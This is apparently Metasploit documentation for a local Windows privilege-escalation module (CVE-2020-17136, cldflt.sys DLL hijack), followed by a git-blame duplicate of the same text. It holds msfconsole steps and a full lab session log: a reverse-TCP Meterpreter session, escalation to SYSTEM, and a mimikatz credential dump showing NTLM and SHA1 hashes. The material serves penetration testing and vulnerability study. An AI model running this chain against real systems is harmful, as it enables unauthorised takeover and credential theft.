documentation/modules/exploit/windows/local/cve_2020_17136.md

## Vulnerable Application
The Cloud Filter driver, `cldflt.sys`, on Windows 10 v1803 and later, prior to the December 2020 updates,
did not set the `IO_FORCE_ACCESS_CHECK` and `OBJ_FORCE_ACCESS_CHECK` flags when calling
`FltCreateFileEx()` and `FltCreateFileEx2()` within its `HsmpOpCreatePlaceholders()` function with attacker
controlled input. This meant that files were created with `KernelMode` permissions, thereby bypassing any
security checks that would otherwise prevent a normal user from being able to create files in directories
they don't have permissions to create files in.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
the `SYSTEM` user.

### Installation And Setup
`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.

## Verification Steps
  1. Start msfconsole
  2. Get a shell as a low privileged user.
  3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
  4. `use exploit/windows/local/cve_2020_17136`
  5. `set session *session id*`
  6. `run`
  7. **Verify** that you get a new shell as the `N` user

## Options

### AMSIBYPASS
Enable or disable ASMI bypass.

### ETWBYPASS
Enable or disable ETW bypass.

### WAIT
Time in seconds to wait before starting to read the text output from the injected C# exe.

## Scenarios

### Windows 10 2004 x64 - Build 19041.630 with cldflt.sys version 10.0.19041.488

```
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600

meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > show options

Module options (exploit/windows/local/cve_2020_17136):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AMSIBYPASS  true             yes       Enable Amsi bypass
   ETWBYPASS   true             yes       Enable Etw bypass
   SESSION     1                yes       The session to run this module on.
   WAIT        5                no        Time in seconds to wait


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
LHOST => 172.22.159.28
msf6 exploit(windows/local/cve_2020_17136) > run

[*] Started reverse TCP handler on 172.22.159.28:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 100 launched.
[*] Reflectively injecting the Host DLL into 100..
[*] Injecting Host into 100...
[*] Host injected. Copy assembly into 100...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2733760425760
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
normal    DESKTOP-KUO5CML  a38673ad58b19421e952fc317b62c3c4  ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test      DESKTOP-KUO5CML  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-KUO5CML$  WORKGROUP        (null)
normal            DESKTOP-KUO5CML  (null)
test              DESKTOP-KUO5CML  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-kuo5cml$  WORKGROUP        (null)
normal            DESKTOP-KUO5CML  (null)
test              DESKTOP-KUO5CML  (null)


meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2020_17136) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML  0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)

msf6 exploit(windows/local/cve_2020_17136) >
```
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`## Vulnerable Application`
			The Cloud Filter driver, `cldflt.sys`, on Windows 10 v1803 and later, prior to the December 2020 updates,
			did not set the `IO_FORCE_ACCESS_CHECK` and `OBJ_FORCE_ACCESS_CHECK` flags when calling
			`FltCreateFileEx()` and `FltCreateFileEx2()` within its `HsmpOpCreatePlaceholders()` function with attacker
			controlled input. This meant that files were created with `KernelMode` permissions, thereby bypassing any
			`security checks that would otherwise prevent a normal user from being able to create files in directories`
			`they don't have permissions to create files in.`

			`This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
			strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
			allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
			Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
			the `SYSTEM` user.
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
			`### Installation And Setup`
			`cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.

			`## Verification Steps`
			`1. Start msfconsole`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`2. Get a shell as a low privileged user.`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			3. Verify that `getsystem` does not get you a `SYSTEM` shell.
			4. `use exploit/windows/local/cve_2020_17136`
			5. `set session session id`
			6. `run`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			7. Verify that you get a new shell as the `N` user
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
			`## Options`

Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`### AMSIBYPASS`
			`Enable or disable ASMI bypass.`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`### ETWBYPASS`
			`Enable or disable ETW bypass.`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`### WAIT`
Update the exploit a bit more to remove excess options and also update the documentation accordingly. 2021-01-06 12:16:06 -06:00			`Time in seconds to wait before starting to read the text output from the injected C# exe.`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
			`## Scenarios`

			`### Windows 10 2004 x64 - Build 19041.630 with cldflt.sys version 10.0.19041.488`

			```
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`msf6 exploit(multi/handler) > run`

			`[*] Started bind TCP handler against 172.22.152.177:4444`
			`[*] Sending stage (200262 bytes) to 172.22.152.177`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
			`meterpreter > getuid`
			`Server username: DESKTOP-KUO5CML\normal`
			`meterpreter > getprivs`

			`Enabled Process Privileges`
			`==========================`

			`Name`
			`----`
			`SeChangeNotifyPrivilege`
			`SeIncreaseWorkingSetPrivilege`
			`SeShutdownPrivilege`
			`SeTimeZonePrivilege`
			`SeUndockPrivilege`

			`meterpreter > getsystem`
			`[-] 2001: Operation failed: Access is denied. The following was attempted:`
			`[-] Named Pipe Impersonation (In Memory/Admin)`
			`[-] Named Pipe Impersonation (Dropper/Admin)`
			`[-] Token Duplication (In Memory/Admin)`
			`[-] Named Pipe Impersonation (RPCSS variant)`
			`meterpreter > background`
			`[*] Backgrounding session 1...`
			`msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136`
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`[*] Using configured payload windows/x64/meterpreter/reverse_tcp`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1`
			`SESSION => 1`
			`msf6 exploit(windows/local/cve_2020_17136) > check`
			`[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`msf6 exploit(windows/local/cve_2020_17136) > show options`

			`Module options (exploit/windows/local/cve_2020_17136):`

Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`AMSIBYPASS true yes Enable Amsi bypass`
			`ETWBYPASS true yes Enable Etw bypass`
			`SESSION 1 yes The session to run this module on.`
			`WAIT 5 no Time in seconds to wait`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00

			`Payload options (windows/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)`
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`LHOST yes The listen address (an interface may be specified)`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`0 Windows DLL Dropper`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00

Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28`
			`LHOST => 172.22.159.28`
			`msf6 exploit(windows/local/cve_2020_17136) > run`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`[*] Started reverse TCP handler on 172.22.159.28:4444`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`[*] Running module against DESKTOP-KUO5CML`
			`[*] Launching notepad.exe to host CLR...`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`[+] Process 100 launched.`
			`[*] Reflectively injecting the Host DLL into 100..`
			`[*] Injecting Host into 100...`
			`[*] Host injected. Copy assembly into 100...`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`[*] Assembly copied.`
			`[*] Executing...`
			`[*] Start reading output`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`[+] Sync connection key: 2733760425760`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`[+] Done`
			`[*] End output.`
			`[+] Execution finished.`
			`[*] Sending stage (200262 bytes) to 172.22.152.177`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`meterpreter > getuid`
			`Server username: NT AUTHORITY\NETWORK SERVICE`
			`meterpreter > getprivs`

			`Enabled Process Privileges`
			`==========================`

			`Name`
			`----`
			`SeAssignPrimaryTokenPrivilege`
			`SeAuditPrivilege`
			`SeChangeNotifyPrivilege`
			`SeCreateGlobalPrivilege`
			`SeImpersonatePrivilege`
			`SeIncreaseQuotaPrivilege`
			`SeIncreaseWorkingSetPrivilege`
			`SeShutdownPrivilege`
			`SeTimeZonePrivilege`
			`SeUndockPrivilege`

			`meterpreter > getsystem`
			`...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00			`meterpreter > getprivs`

			`Enabled Process Privileges`
			`==========================`

			`Name`
			`----`
			`SeAssignPrimaryTokenPrivilege`
			`SeAuditPrivilege`
			`SeChangeNotifyPrivilege`
			`SeCreateGlobalPrivilege`
			`SeImpersonatePrivilege`
			`SeIncreaseQuotaPrivilege`
			`SeIncreaseWorkingSetPrivilege`
			`SeShutdownPrivilege`
			`SeTimeZonePrivilege`
			`SeUndockPrivilege`

Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`meterpreter > load kiwi`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`Loading extension kiwi...`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`.#####. mimikatz 2.2.0 20191125 (x64/windows)`
			`.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)`
			## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
			`## \ / ## > http://blog.gentilkiwi.com/mimikatz`
			`'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )`
			`'#####' > http://pingcastle.com / http://mysmartlogon.com ***/`

			`Success.`
			`meterpreter > creds_all`
			`[+] Running as SYSTEM`
			`[*] Retrieving all credentials`
			`msv credentials`
			`===============`

			`Username Domain NTLM SHA1`
			`-------- ------ ---- ----`
			`normal DESKTOP-KUO5CML a38673ad58b19421e952fc317b62c3c4 ccff8cc980f0024dc5b3f925194a35c0fa0231c3`
			`test DESKTOP-KUO5CML 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1`

			`wdigest credentials`
			`===================`

			`Username Domain Password`
			`-------- ------ --------`
			`(null) (null) (null)`
			`DESKTOP-KUO5CML$ WORKGROUP (null)`
			`normal DESKTOP-KUO5CML (null)`
			`test DESKTOP-KUO5CML (null)`

			`kerberos credentials`
			`====================`

			`Username Domain Password`
			`-------- ------ --------`
			`(null) (null) (null)`
			`desktop-kuo5cml$ WORKGROUP (null)`
			`normal DESKTOP-KUO5CML (null)`
			`test DESKTOP-KUO5CML (null)`


Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`meterpreter >`
			`Background session 2? [y/N]`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00			`msf6 exploit(windows/local/cve_2020_17136) > sessions`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`1 meterpreter x64/windows DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML 0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)`
Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00			`2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML 172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)`
Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
			`msf6 exploit(windows/local/cve_2020_17136) >`
			```